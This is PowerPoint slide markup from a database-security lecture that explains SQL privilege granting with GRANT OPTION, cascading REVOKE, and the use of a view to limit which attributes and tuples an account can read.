            <a:ext cx="8774112" cy="4494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A1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> wants to allow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A3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> to retrieve information from either of the two tables and also to be able to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propagate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> the SELECT privilege to other accounts.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A1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> can issue the command: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       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>GRANT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ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>ON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EMPLOYEE, DEPARTMENT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>TO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A3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ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>WITH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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GRANT OPTION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>;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A3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> can grant the SELECT privilege on the EMPLOYEE relation to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A4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> by issuing: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      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>GRANT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ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>ON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EMPLOYEE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ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>TO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A4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;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A1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> decides to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revoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> the SELECT privilege on the EMPLOYEE relation from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A3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>; A1 can issue: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       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>REVOKE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ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>ON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EMPLOYEE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ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>FROM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A3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="290CD6"/>
                </a:solidFill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The DBMS must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automatically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revoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> the SELECT privilege on EMPLOYEE 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from A4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>, because A3 granted that privilege to A4 and A3 does not have the privilege any more.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33797" name="群組 14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1800225" y="5373688"/>
            <a:ext cx="4883150" cy="982662"/>
            <a:chOff x="1799651" y="5373934"/>
            <a:chExt cx="4883150" cy="982663"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33798" name="Picture 5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9651" y="5462834"/>
              <a:ext cx="942975" cy="89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9" name="Picture 4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85651" y="5596184"/>
              <a:ext cx="73025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向右箭號 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2904551" y="5702547"/>
              <a:ext cx="982663" cy="2667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3801" name="矩形 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3009326" y="5807322"/>
              <a:ext cx="7826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grant</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33802" name="Picture 4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52551" y="5610472"/>
              <a:ext cx="73025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3" name="向右箭號 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4903214" y="5702547"/>
              <a:ext cx="982662" cy="2667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3804" name="矩形 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5007989" y="5807322"/>
              <a:ext cx="7826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grant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3805" name="矩形 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2655314" y="5396159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A1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3806" name="矩形 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3685601" y="5373934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A3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3807" name="矩形 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5541389" y="5373934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A4</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline="0">
                <a:ea typeface="新細明體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2933700" y="6202931"/>
            <a:ext cx="160695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TW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ith GRANT option</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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04238" y="6386513"/>
            <a:ext cx="554037" cy="387350"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{43F1DF96-DC8D-46AF-81AF-C358E39C0EDF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2.2 Specifying Privileges Using Views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835025"/>
            <a:ext cx="8774112" cy="444658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view</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>, the account must have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SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> privilege on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all relations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involved in the view definition.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mechanism of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>views</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> is an important discretionary authorization mechanism in its own right.</a:t>
            </a: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If the owner A of a relation R wants another account B to be able to retrieve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some fields</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>, then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can create a view V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> that includes only those attributes and then grant SELECT on V to B. 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same applies to limiting B to retrieving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certain tuples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>; a view V’ can be created by defining the view by means of a query that selects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those tuples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> that A wants to allow B to access.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846388" y="5486400"/>
            <a:ext cx="3525837" cy="1223963"/>
            <a:chOff x="2846388" y="5486400"/>
            <a:chExt cx="3525837" cy="1223963"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34821" name="群組 16"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2846388" y="5486400"/>
              <a:ext cx="3525837" cy="1223963"/>
              <a:chOff x="2846784" y="5486340"/>
              <a:chExt cx="3372598" cy="1224083"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34823" name="矩形 6"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2967037" y="5810250"/>
                <a:ext cx="828675" cy="576263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609600" indent="-609600"/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34824" name="文字方塊 7"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2909887" y="5486340"/>
                <a:ext cx="5381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 b="1" baseline="0">
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t>R</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0">
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34825" name="文字方塊 9"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2846784" y="6310313"/>
                <a:ext cx="13168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 b="1" baseline="0">
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t>owner A</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0">
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34826" name="文字方塊 10"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5334596" y="5910203"/>
                <a:ext cx="88478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 b="1" baseline="0">
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t>user B</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0">
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2" name="矩形 11"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4432103" y="5829274"/>
                <a:ext cx="372033" cy="2873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609600" indent="-609600"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828" name="文字方塊 12"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4384427" y="5486340"/>
                <a:ext cx="5381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 b="1" baseline="0">
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t>V</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0">
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="34829" name="直線單箭頭接點 14"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3895725" y="6115050"/>
                <a:ext cx="376238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4830" name="直線單箭頭接點 15"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4953000" y="6115050"/>
                <a:ext cx="376238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4" name="矩形 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3302000" y="5837238"/>
              <a:ext cx="396875" cy="279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023458" y="3129094"/>
            <a:ext cx="3215168" cy="1317071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09600" marR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</a:pPr>
            <a:endParaRPr kumimoji="0" lang="zh-TW" altLang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="-2500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711200"/>
            <a:ext cx="8774112" cy="4764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>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>A1 wants to give back to A3 a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>limited capability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>to SELECT from the EMPLOYEE relation and wants to allow A3 to be able to propagate the privilege. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>The limitation is to retrieve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the NAME, BDATE, and ADDRESS attributes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體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for the tuples with DNO=5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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>A1 then create the view:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="714375" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>CREATE VIEW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A3EMPLOYEE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> AS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="714375" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>SELECT NAME, BDATE, ADDRESS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="714375" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>FROM EMPLOYEE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="714375" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>WHERE DNO = 5;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>A1 can grant SELECT on the view A3EMPLOYEE to A3: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TW" sz="2000" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>      GRANT SELECT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A3EMPLOYEE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> TO A3 WITH GRANT OPTION;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3584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67725" y="6386513"/>
            <a:ext cx="590550" cy="387350"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{15D9684B-7712-4ED9-8EC1-169E712D2D12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0"/>
            <a:ext cx="8774112" cy="884238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An Example(4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35845" name="群組 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4410599" y="5483695"/>
            <a:ext cx="3016250" cy="1017588"/>
            <a:chOff x="2314575" y="5791200"/>
            <a:chExt cx="3016250" cy="1017588"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35846" name="Picture 5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4575" y="5880100"/>
              <a:ext cx="942975" cy="89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4" descr="j019538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00575" y="6013450"/>
              <a:ext cx="730250" cy="74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8" name="向右箭號 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3419475" y="6119813"/>
              <a:ext cx="982663" cy="2667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35849" name="矩形 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3324225" y="6224588"/>
              <a:ext cx="9826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600" b="1" baseline="0" dirty="0">
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:rPr>
                <a:t>grant on </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" baseline="0" dirty="0">
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:rPr>
                <a:t>view</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" baseline="0" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35850" name="矩形 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3170238" y="5813425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A1</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35851" name="矩形 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4200525" y="579120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 dirty="0" smtClean="0">
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:rPr>
                <a:t>A3</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline="0" dirty="0">
                <a:ea typeface="新細明體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960775" y="5451475"/>
            <a:ext cx="3441475" cy="1223963"/>
            <a:chOff x="2846388" y="5486400"/>
            <a:chExt cx="3441475" cy="1223963"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="14" name="群組 16"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2846388" y="5486400"/>
              <a:ext cx="3441475" cy="1223963"/>
              <a:chOff x="2846784" y="5486340"/>
              <a:chExt cx="3291907" cy="1224083"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16" name="矩形 6"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2967037" y="5810250"/>
                <a:ext cx="828675" cy="576263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609600" indent="-609600"/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7" name="文字方塊 7"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2909886" y="5486340"/>
                <a:ext cx="766755" cy="400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baseline="0" dirty="0" smtClean="0">
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t>EMP</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0" dirty="0">
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="文字方塊 9"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2846784" y="6310313"/>
                <a:ext cx="131683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 b="1" baseline="0" dirty="0">
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t>owner </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" baseline="0" dirty="0" smtClean="0">
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t>A1</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0" dirty="0">
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="文字方塊 10"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5045716" y="5910203"/>
                <a:ext cx="1092975" cy="400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baseline="0" dirty="0" smtClean="0">
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t>A3</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0" dirty="0">
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="矩形 11"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4239516" y="5829274"/>
                <a:ext cx="372033" cy="28736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609600" indent="-609600"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1" name="文字方塊 12"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4089877" y="5494967"/>
                <a:ext cx="1125613" cy="400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baseline="0" dirty="0" smtClean="0">
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t>A3EMP</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0" dirty="0">
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="22" name="直線單箭頭接點 14"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3831530" y="6115050"/>
                <a:ext cx="376238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3" name="直線單箭頭接點 15"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4664122" y="6115050"/>
                <a:ext cx="376238" cy="1588"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="38100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3302000" y="5837238"/>
              <a:ext cx="396875" cy="279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20100" y="6386513"/>
            <a:ext cx="638175" cy="387350"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F32E5A3A-5C85-4057-8CE1-8E0A9D8C1C17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An Example (5)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06475"/>
            <a:ext cx="8535987" cy="3298825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Suppose that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>A1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> wants to allow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>A4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
